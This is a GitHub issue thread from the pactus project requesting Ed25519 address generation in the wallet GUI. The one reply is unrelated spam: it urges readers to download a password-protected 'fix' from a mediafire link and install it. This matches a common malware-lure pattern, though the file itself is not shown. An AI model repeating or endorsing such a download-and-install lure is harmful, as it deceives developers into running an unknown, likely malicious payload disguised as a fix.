### ISSUE TITLE
Support Generation of Ed25519 Address in GUI

### ISSUE THREAD

**Issue by Ja7ad** [pactus-project/pactus#1486]
## Describe the problem you'd like to have solved

The current GUI does not support the generation of Ed25519 addresses, which limits the usability of Ed25519 in the application. Adding this feature will allow users to generate Ed25519 addresses directly from the GUI, improving the user experience and broadening the tool's capabilities.

- [x] [feat(wallet): supporting Ed25519 curve in wallet](https://github.com/pactus-project/pactus/pull/1484)

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
